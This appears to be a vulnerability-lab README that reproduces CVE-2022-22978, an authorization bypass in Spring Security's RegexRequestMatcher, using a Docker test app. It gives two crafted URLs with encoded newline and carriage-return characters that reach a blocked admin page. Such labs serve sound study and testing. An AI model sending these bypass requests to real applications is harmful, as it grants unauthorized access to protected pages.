Spring Security Authorization Bypass in RegexRequestMatcher (CVE-2022-22978)¶

中文版本(Chinese version)

The Spring Security framework is used to provide security authentication functionality in the Spring framework. In Spring Security versions 5.5.6 and 5.6.3 and older unsupported versions, applications using RegexRequestMatcher with . in the regular expression are possibly vulnerable to an authorization bypass.

References:

• https://tanzu.vmware.com/security/cve-2022-22978
• https://github.com/DeEpinGh0st/CVE-2022-22978

Vulnerability Environment¶

Execute the following command to start a Web application based on Spring Security 5.6.3:

docker compose up -d

After the server starts, browse to http://your-ip:8080/admin to see that access to the admin page is blocked.

Vulnerability Reproduce¶

Send the following request to access the admin page that bypassed the authentication:

• http://your-ip:8080/admin/%0atest
• http://your-ip:8080/admin/%0dtest